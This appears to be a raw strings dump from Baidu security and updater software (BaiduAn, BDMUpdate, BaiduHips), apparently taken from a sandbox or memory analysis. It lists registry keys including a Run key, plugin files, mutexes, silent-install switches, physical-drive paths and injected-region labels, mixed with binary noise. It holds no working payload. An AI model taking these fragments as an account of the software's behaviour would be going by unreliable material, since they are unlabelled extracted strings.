4L4U4s4y43> >$>(>,>0>4>8>? ?$?(?,?0?4?8?HKEY_LOCAL_MACHINE\SoftwareHKEY_CURRENT_USER\Software\Classes\CLSIDHKEY_CURRENT_USER\Software\Classes\DirectShowHKEY_CURRENT_USER\Software\Classes\InterfaceHKEY_CURRENT_USER\Software\Classes\Media TypeHKEY_CURRENT_USER\Software\Classes\MediaFoundationHKEY_CLASSES_ROOT\CLSIDHKEY_CLASSES_ROOT\DirectShowHKEY_CLASSES_ROOT\InterfaceHKEY_CLASSES_ROOT\Media TypeHKEY_CLASSES_ROOT\MediaFoundationHKEY_LOCAL_MACHINE\Software\Wow6432NodeHKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSIDHKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShowHKEY_CURRENT_USER\Software\Wow6432Node\Classes\InterfaceHKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media TypeHKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundationHKEY_CLASSES_ROOT\Wow6432Node\CLSIDHKEY_CLASSES_ROOT\Wow6432Node\DirectShowHKEY_CLASSES_ROOT\Wow6432Node\InterfaceHKEY_CLASSES_ROOT\Wow6432Node\Media TypeHKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation\GameNoDisturb.ini
d.d.d d:d
\GlobalPluginInfo.xml
\LocalPluginInfo.xml
PluginSetup.xml
BaiduAnLOCAL_PLUGIN_MOD_MUTEX_{118A205F-4B51-4944-8384-93CC04727168}
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
{E2206DEE-0CAF-4337-8DA8-1EF057A426B8}
\PluginSetup.xml
PackCache_overall_plugin_update.xml
\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
IBDMUPDATE_{A2EBD9CD-6348-4980-B95F-202BE39A46F3}
{DCD4260B-CEED-4514-895D-CA0AF61DEA5E}
UninstalledPlugins.xml
\bdmantivirus\kavupdate.dll
BDMUpdate.dll
BDMNet.dll
eBaiduAnUpdate.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
/S /handle=%d /installmode=1
/S /handle=%d /installmode=1 /startmain=0
"{0}" {1}
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
ic_info_64.png
ic_warning_48.png
ic_question_48.png
ic_done_48.png
BDMUpdateWnd.xml
BaiduAn.exe
BaiduAnTray.exe
btn_close_hover.png
btn_close_pressed.png
btn_ok_hover.png
btn_ok_pressed.png
ic_done_48_48.png
ic_info_48_48.png
important_tip
CommonRes.rdb
CommonMsgBox
CommonMsgBox.xml
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
ntdll.dll
EXPLORER.EXE
explorer.exe
file='skin_image16.png' xtiled='true' ytiled='true'
skin_image16.png
file='%s' xtiled='true' ytiled='true'
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
okernel32.dll
HKEY_USERS
xxxxxxxxxxxxxxxx
EKernel32.dll
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
GWintrust.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
E{X-X-X-XX-XXXXXX}
D823ABCA-A92F-429d-9E11-3779B5F682AA
E##cmd:
\NotInstalledPlugin.xml
\HotPlugins.xml
\HotPlugin.bnr
{E5B65788-3C2C-4F59-92E7-58C9205BC66E}
BDMDownload.dll
BPackCache.xml
CUninstalledPlugins.xml
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
C.bdtmp
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
\Global.db
Diphlpapi.dll
D\\.\PhysicalDrive%d
\\.\Scsi%d:
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
3.0.0.3971
BaiduanUpdate.exeservices.exe_724_rwx_00040000_00001000:
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dllsvchost.exe_1084_rwx_018A0000_00001000:
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll
3j3>3r3>